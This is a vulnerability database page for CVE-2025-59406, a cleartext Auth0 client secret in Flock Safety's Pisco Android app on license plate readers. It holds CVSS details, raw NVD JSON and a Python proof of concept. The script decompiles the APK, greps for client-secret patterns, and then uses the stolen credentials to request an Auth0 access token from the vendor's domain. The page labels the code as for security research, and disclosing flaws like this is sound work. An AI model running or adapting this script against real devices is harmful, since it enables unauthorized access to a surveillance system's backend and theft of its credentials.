Security Vulnerability Report
中文
CVE-2025-59406 CVSS 6.2 MEDIUM

CVE-2025-59406

Published: 2025-10-02 17:16:07
Last Modified: 2025-10-24 17:27:13
Source: [email protected]

Description

The Flock Safety Pisco com.flocksafety.android.pisco application 6.21.11 for Android (installed on Falcon and Sparrow License Plate Readers and Bravo Edge AI Compute Devices) has a cleartext Auth0 client secret in its codebase. Because application binaries can be trivially decompiled or inspected, attackers can recover this OAuth secret without special privileges. This secret is intended to remain confidential and should never be embedded directly in client-side software.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:flocksafety:flock_safety:6.21.11:*:*:*:*:android:*:* - VULNERABLE
com.flocksafety.android.pisco 6.21.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-59406 PoC - Extract Auth0 Client Secret from Flock Safety Pisco APK # This PoC demonstrates how to extract the hardcoded Auth0 client secret import subprocess import re import os def extract_auth0_secret(apk_path): """ Extract Auth0 client secret from Flock Safety Pisco Android APK """ # Step 1: Decompile APK using jadx or apktool output_dir = "decompiled_pisco" # Using jadx for decompilation cmd = f"jadx -d {output_dir} {apk_path}" subprocess.run(cmd, shell=True) # Step 2: Search for Auth0 configuration patterns in decompiled source auth0_patterns = [ r'client_secret["\s:=]+["\']([A-Za-z0-9_-]+)["\']', r'AUTH0_CLIENT_SECRET["\s:=]+["\']([A-Za-z0-9_-]+)["\']', r'com\.auth0\.client\.secret["\s:=]+["\']([A-Za-z0-9_-]+)["\']', r'"client_secret"\s*:\s*"([A-Za-z0-9_-]+)"', ] secrets_found = [] # Step 3: Walk through decompiled files and search for secrets for root, dirs, files in os.walk(output_dir): for file in files: if file.endswith(('.java', '.kt', '.json', '.xml', '.properties')): filepath = os.path.join(root, file) with open(filepath, 'r', errors='ignore') as f: content = f.read() for pattern in auth0_patterns: matches = re.findall(pattern, content) for match in matches: secrets_found.append({ 'file': filepath, 'secret': match }) return secrets_found def exploit_auth0_secret(client_id, client_secret, domain): """ Use extracted credentials to perform unauthorized Auth0 operations """ import requests # Attempt to obtain access token using stolen client credentials token_url = f"https://{domain}/oauth/token" payload = { 'grant_type': 'client_credentials', 'client_id': client_id, 'client_secret': client_secret, 'audience': f'https://{domain}/api/v2/' } response = requests.post(token_url, json=payload) if response.status_code == 200: token = response.json().get('access_token') print(f"[+] Successfully obtained access token: {token[:20]}...") return token else: print(f"[-] Failed to obtain token: {response.text}") return None # Usage if __name__ == "__main__": apk_path = "com.flocksafety.android.pisco_6.21.11.apk" secrets = extract_auth0_secret(apk_path) for secret_info in secrets: print(f"[!] Found Auth0 secret in {secret_info['file']}") print(f" Secret: {secret_info['secret']}") # Example: Use the extracted secret # token = exploit_auth0_secret(client_id, client_secret, 'flocksafety.auth0.com')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-59406", "sourceIdentifier": "[email protected]", "published": "2025-10-02T17:16:06.880", "lastModified": "2025-10-24T17:27:12.890", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Flock Safety Pisco com.flocksafety.android.pisco application 6.21.11 for Android (installed on Falcon and Sparrow License Plate Readers and Bravo Edge AI Compute Devices) has a cleartext Auth0 client secret in its codebase. Because application binaries can be trivially decompiled or inspected, attackers can recover this OAuth secret without special privileges. This secret is intended to remain confidential and should never be embedded directly in client-side software."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-319"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flocksafety:flock_safety:6.21.11:*:*:*:*:android:*:*", "matchCriteriaId": "0CD8C06F-A79E-4CBE-80EF-7EB7CAB361C1"}]}]}], "references": [{"url": "https://gainsec.com/2025/09/27/fly-by-device-2-the-falcon-sparrow-gated-wireless-rce-camera-feed-dos-information-disclosure-and-more/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://gainsec.com/wp-content/uploads/2025/09/Root-from-the-Coop-Device-3_-Root-Shell-on-Flock-Safetys-Bravo-Compute-Box-GainSec.pdf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.flocksafety.com/products", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.flocksafety.com/products/license-plate-readers", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.